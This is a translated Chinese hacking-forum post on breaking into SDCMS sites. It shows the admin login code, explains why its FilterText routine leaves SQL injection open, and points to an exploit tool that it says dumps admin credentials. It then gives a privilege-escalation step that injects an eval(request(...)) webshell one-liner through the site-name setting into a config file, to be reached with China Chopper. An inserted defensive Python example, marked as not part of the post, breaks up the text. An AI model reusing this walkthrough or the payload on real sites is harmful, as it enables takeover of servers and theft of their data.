Author: T00LS 鬼哥
Vulnerable file: admin directory/index.asp
Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        'username goes into the SQL string by concatenation after FilterText(...,1)
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            'Automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
We can see that username is filtered through FilterText. Let's look at the code of FilterText:
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            t0=Replace(t0,Chr(8),"")   'backspace
            t0=Replace(t0,Chr(9),"")   'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")  'line feed
            t0=Replace(t0,Chr(11),"")  'vertical tab
            t0=Replace(t0,Chr(12),"")  'form feed
            t0=Replace(t0,Chr(13),"")  'carriage return; chr(13)&chr(10) is the CR+LF combination
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")  'SPACE
            t0=Replace(t0,Chr(33),"")  '!
            t0=Replace(t0,Chr(34),"")  '"
            t0=Replace(t0,Chr(35),"")  '#
            t0=Replace(t0,Chr(36),"")  '$
            t0=Replace(t0,Chr(37),"")  '%
            t0=Replace(t0,Chr(38),"")  '&
            t0=Replace(t0,Chr(39),"")  ''
            t0=Replace(t0,Chr(40),"")  '(
            t0=Replace(t0,Chr(41),"")  ')
            t0=Replace(t0,Chr(42),"")  '*
            t0=Replace(t0,Chr(43),"")  '+
            t0=Replace(t0,Chr(44),"")  ',
            t0=Replace(t0,Chr(45),"")  '-
            t0=Replace(t0,Chr(46),"")  '.
            t0=Replace(t0,Chr(47),"")  '/
            t0=Replace(t0,Chr(58),"")  ':
            t0=Replace(t0,Chr(59),"")  ';
            t0=Replace(t0,Chr(60),"")  '<
            t0=Replace(t0,Chr(61),"")  '=
            t0=Replace(t0,Chr(62),"")  '>
            t0=Replace(t0,Chr(63),"")  '?
            t0=Replace(t0,Chr(64),"")  '@
            t0=Replace(t0,Chr(91),"")  '[
            t0=Replace(t0,Chr(92),"")  '\
            t0=Replace(t0,Chr(93),"")  ']
            t0=Replace(t0,Chr(94),"")  '^
            t0=Replace(t0,Chr(95),"")  '_
            t0=Replace(t0,Chr(96),"")  '`
            t0=Replace(t0,Chr(123),"") '{
            t0=Replace(t0,Chr(124),"") '|
            t0=Replace(t0,Chr(125),"") '}
            t0=Replace(t0,Chr(126),"") '~
        Case Else
            'HTML-encode; the forum rendering decoded the entities, restored here
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")   'original entity lost in rendering; &#39; is assumed
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        'inserts a soft hyphen (U+00AD) into "expression" to break CSS expression() payloads
        t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
See? When the parameter is 1, it only filters:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")
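As an added example (not from this post and not SDCMS code), the following Python emulates what FilterText does in mode 1, checks whether SQL-significant characters survive it, and shows the login lookup from Check rewritten with bound parameters; sqlite3 and the single admin row stand in for the real Sd_Admin backend and are constructed here.

```python
import hashlib
import sqlite3


def filter_text_mode1(t0: str) -> str:
    """Emulates FilterText(t0, 1): strips only spaces, CR and LF."""
    t0 = t0.strip()
    for ch in (" ", "\r", "\n\n", "\n"):
        t0 = t0.replace(ch, "")
    return t0


# Characters with meaning inside a SQL string literal. Mode 1 touches
# none of them, so FilterText(...,1) is not a SQL injection defence.
SQL_METACHARS = set("'\";-/()")


def leaks_sql_metachars(value: str) -> bool:
    """True when FilterText mode 1 output still contains SQL metacharacters."""
    return any(c in SQL_METACHARS for c in filter_text_mode1(value))


def setup_db() -> sqlite3.Connection:
    """Constructed stand-in for Sd_Admin with one admin row.
    The password is stored as md5, as the original code does."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Sd_Admin("
        "Id INTEGER PRIMARY KEY, Sdcms_Name TEXT, Sdcms_Pwd TEXT, isadmin INTEGER)"
    )
    conn.execute(
        "INSERT INTO Sd_Admin VALUES (1, 'admin', ?, 1)",
        (hashlib.md5(b"S3cret-demo").hexdigest(),),
    )
    conn.commit()
    return conn


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form of the lookup in Check: user input travels as bound
    parameters, so a quote in the username is data, never SQL syntax.
    Returns the admin Id on success, None otherwise."""
    u = filter_text_mode1(username)
    pwd_hash = hashlib.md5(password.encode("utf-8")).hexdigest()
    row = conn.execute(
        "SELECT Id FROM Sd_Admin WHERE Sdcms_Name=? AND Sdcms_Pwd=?",
        (u, pwd_hash),
    ).fetchone()
    return row[0] if row else None
```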
The vulnerability lets you obtain the admin account and password directly. SDCMS's default admin path is /admin/; if the site owner changed the admin path, find it yourself!

EXP tool download (this tool only runs on XP): sdcms-EXP

Test:

Now enter the captcha into the tool, then click OK.

See, we went straight into the admin management interface, haha!

Straight into the backend like this....

SDCMS privilege escalation:

Method 1: visit /admin directory/sdcms_set.asp and append “:eval(request(Chr(63)))’ after the 网站名称 (site name) field; that writes a one-liner straight into /inc/Const.asp. The one-liner's connection password is ?

OK, now connect with 菜刀!